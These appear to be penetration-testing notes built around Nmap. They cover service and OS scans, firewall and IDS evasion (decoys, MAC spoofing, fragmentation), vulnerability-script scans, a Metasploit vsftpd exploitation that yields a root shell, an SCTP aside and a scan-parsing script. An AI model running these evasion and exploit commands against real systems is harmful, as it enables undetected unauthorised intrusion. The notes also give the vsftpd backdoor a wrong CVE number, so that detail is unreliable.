# -sV: detect services and their versions
# -iL: read the list of targets from a file

sudo nmap -sV -iL iplist.txt

# -O: detect the operating system

sudo nmap -O -iL iplist.txt

# -T3: set the timing template
# 0 is the slowest
# 5 is the fastest
# 3 is the default

# Never use 0, it is too slow (45 minutes)
# and you will be blocked by the firewall

sudo nmap scanme.nmap.org -T3

# -D RND:20: this option tells Nmap to use spoofed (decoy) source addresses
# when sending packets to the target host.
# The RND keyword tells Nmap to generate random source addresses,
# and the 20 value tells Nmap to generate 20 different source addresses.

sudo nmap 10.81.102.23 -D RND:20

SCTP stands for Stream Control Transmission Protocol. It is a connection-oriented transport layer protocol that provides reliable, in-sequence transport of data between two endpoints that have established a connection in a computer network.

SCTP is similar to TCP in that it provides reliable, in-sequence delivery of data. However, it has several advantages over TCP, including:

  • Multihoming: SCTP allows both endpoints of a connection to have multiple IP addresses. This makes it more resilient to network failures, as traffic can be routed to the best available IP address.
  • Multistreaming: SCTP allows multiple streams of data to be sent over a single connection. This can improve performance for applications that need to send different types of data, such as voice, video, and text.
  • Partial reliability: SCTP can be configured to deliver data streams with different levels of reliability. This is useful for applications that need to deliver some types of data more reliably than others.

SCTP is used in a variety of applications, including:

  • Voice over IP (VoIP): SCTP is used to provide reliable transport for VoIP calls.
  • Mobile networks: SCTP is used to provide reliable transport for data services in mobile networks.
  • Signaling systems: SCTP is used to carry signaling traffic between different components of signaling systems, such as SS7 and Diameter.
  • Multimedia applications: SCTP can be used to improve the performance of multimedia applications, such as video streaming and online gaming.

# --randomize-hosts: this option tells Nmap to scan the hosts
# in random order,
# to avoid being blocked by the firewall
# and to stay under the radar of the destination router

sudo nmap -iL iplist.txt --randomize-hosts

sudo nmap -p 22 -iL iplist.txt
# To check which hosts in the file have port 22 open.

# --spoof-mac 0: this option tells Nmap to use a spoofed source MAC
# address for all packets sent to the target host. With the argument 0,
# Nmap picks a random MAC address for the session; a specific MAC,
# a vendor prefix or a vendor name can be given instead.
# The spoofed MAC is only seen on the local Ethernet segment
# (the next-hop router rewrites it).

sudo nmap 10.81.102.24 --spoof-mac 0

# The -f option tells Nmap to send fragmented packets
# to the target host. This can be useful for bypassing firewalls
# and intrusion detection systems that may block non-fragmented packets.

sudo nmap 10.81.102.24 -f
# All the scripts, ready to download:

https://nmap.org/nsedoc/scripts/

# In Kali Linux, the scripts are here:

cd /usr/share/nmap/scripts

# --script smb-vuln-ms17-010.nse:
# This option tells Nmap to run the NSE script
# smb-vuln-ms17-010.nse on each of the target hosts
# (the .nse suffix may also be omitted).
# This script checks for the MS17-010 vulnerability
# in SMBv1 servers.

sudo nmap -iL iplist.txt --script smb-vuln-ms17-010.nse
# --script ftp-vsftpd-backdoor: this option tells Nmap to run the NSE script
# ftp-vsftpd-backdoor on each of the target hosts.
# This script checks for the vsftpd 2.3.4 backdoor vulnerability
# CVE-2021-35962.
# -p 21: this option tells Nmap to scan the target hosts
# on port 21, which is the default port for FTP.

sudo nmap -iL iplist.txt --script ftp-vsftpd-backdoor -p 21

# --script vuln: this option tells Nmap to run all of the
# NSE scripts in the vuln category of the Nmap script database.

# This command is useful for scanning networks for hosts that are
# vulnerable to known vulnerabilities.
# The Nmap script database contains hundreds of scripts that check
# for a wide variety of vulnerabilities, including remote code
# execution vulnerabilities, privilege escalation vulnerabilities,
# and information disclosure vulnerabilities.
# Many vuln scripts are also in the intrusive category and the
# full set takes a long time against a large host list.

sudo nmap -iL iplist.txt --script vuln
# METASPLOIT by Rapid7
sudo msfconsole
msf6 > search vsftp
msf6 > use 0
# option 0 is the first module found by the search
set rhosts 10.81.102.123
run
whoami
ifconfig
# 10.81.102.123 as root

  1. Basic Scanning:

    • `nmap target`: Basic port scan on a single target.
    • `nmap -O target`: Perform OS detection on a target.
    • `nmap -sV target`: Determine the versions of services running on a target.
  2. Advanced Scanning:

    • `nmap -A target`: Comprehensive scan including OS detection, version detection, script scanning, and traceroute.
    • `nmap -sC target`: Run the default set of NSE scripts against a target.
    • `nmap -sU target`: Scan for UDP ports on a target.
    • `nmap -sT target`: TCP connect scan (the default when Nmap runs without raw-socket privileges).
  3. Scan Types:

    • `nmap -sS target`: Stealth SYN scan (less noisy than a TCP connect scan; the default when run as root).
    • `nmap -sN target`: Null scan (no TCP flags set).
    • `nmap -sX target`: Xmas scan (FIN, PSH and URG flags set).
    • `nmap -sn target`: Ping scan (host discovery only) to determine if a host is up; `-sP` is the older spelling of the same option.
  4. Scripting and Scripting Engine:

    • `nmap --script=scriptname target`: Run a specific Nmap script against a target.
    • `nmap --script-args=arg1,arg2 target`: Pass arguments to Nmap scripts.
  5. Timing and Performance:

    • `nmap -n target`: Do not resolve hostnames (faster).
    • `nmap -R target`: Perform reverse DNS resolution on all hosts.
    • `nmap -f target`: Fragment packets to bypass firewalls.
    • `nmap -iL file`: Scan hosts listed in a file.
    • `nmap -sn -iL file`: Ping scan only (no port scan) to find the live hosts first; port-scan just those afterwards to speed up large scans.
  6. Output and Formatting:

    • `nmap -oG scan.gnmap target`: Output in grepable format for further processing.
    • `nmap -oX scan.xml target`: Output in XML format.
    • `nmap -oN scan.txt target`: Output in normal human-readable format (the same as the interactive output on screen).
    • `nmap -sn target -oN output.txt`: Save ping scan results to a file.
  7. Miscellaneous:

    • `nmap -v`: Increase verbosity level.
    • `nmap -T4 target`: Set timing template to aggressive (higher speed).
    • `nmap -Pn target`: Assume all hosts are up (skip host discovery); `-PN` is the older spelling.
    • `nmap --max-retries=3 target`: Set the maximum number of retries for failed probes.
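Once a scan is saved with `-oG` (section 6 above), the earlier question of which hosts in iplist.txt have port 22 open can be answered from the file instead of by rescanning. The script below is an added example, not part of the original notes: the grepable sample it parses is constructed, and the names `make_sample`, `open_ports_report` and `hosts_with_open_port` are chosen here.

```shell
#!/bin/sh
# Added example (not from the original notes): turn Nmap grepable output
# (-oG) into an inventory of open ports and answer "which hosts have
# port 22 open?" from the saved file instead of re-scanning.

# Constructed sample of what `nmap -sV -p 22,80 -iL iplist.txt -oG scan.gnmap`
# writes; addresses and banners are made up for the example.
make_sample() {
    printf '# Nmap 7.94 scan initiated as: nmap -sV -p 22,80 -iL iplist.txt -oG scan.gnmap\n'
    printf 'Host: 10.81.102.23 ()\tStatus: Up\n'
    printf 'Host: 10.81.102.23 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.9p1 Ubuntu/, 80/closed/tcp//http///\tIgnored State: filtered (998)\n'
    printf 'Host: 10.81.102.24 ()\tStatus: Up\n'
    printf 'Host: 10.81.102.24 ()\tPorts: 22/filtered/tcp//ssh///, 80/open/tcp//http//nginx 1.18.0/\n'
    printf 'Host: 10.81.102.25 ()\tStatus: Up\n'
    printf 'Host: 10.81.102.25 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.4/, 80/open/tcp//http//Apache httpd 2.4.6/\n'
    printf '# Nmap done -- 3 IP addresses (3 hosts up) scanned in 5.12 seconds\n'
}

# open_ports_report <gnmap file>: prints "ip port proto service version"
# for every open port. Each entry in the Ports: field has the layout
# port/state/proto/owner/service/rpcinfo/version/ (split on "/").
open_ports_report() {
    awk '
        /^Host:/ && /Ports:/ {
            ip = $2
            sub(/.*Ports: /, "")                     # keep only the port list
            sub(/[[:space:]]Ignored State:.*/, "")   # drop the trailing summary
            n = split($0, entry, /, */)
            for (i = 1; i <= n; i++) {
                split(entry[i], f, "/")
                if (f[2] == "open")
                    print ip, f[1], f[3], (f[5] == "" ? "-" : f[5]), (f[7] == "" ? "-" : f[7])
            }
        }' "$1"
}

# hosts_with_open_port <port> <gnmap file>: IPs on which that TCP port is open
hosts_with_open_port() {
    open_ports_report "$2" | awk -v p="$1" '$2 == p && $3 == "tcp" { print $1 }'
}

# Stand-alone run: write the sample to a file and query it
if [ "${1:-}" = "demo" ]; then
    make_sample > scan.gnmap
    hosts_with_open_port 22 scan.gnmap
fi
```

Run with `sh script.sh demo` to see the two hosts with SSH open; point `open_ports_report` at a real `.gnmap` file to build the same inventory from your own scans.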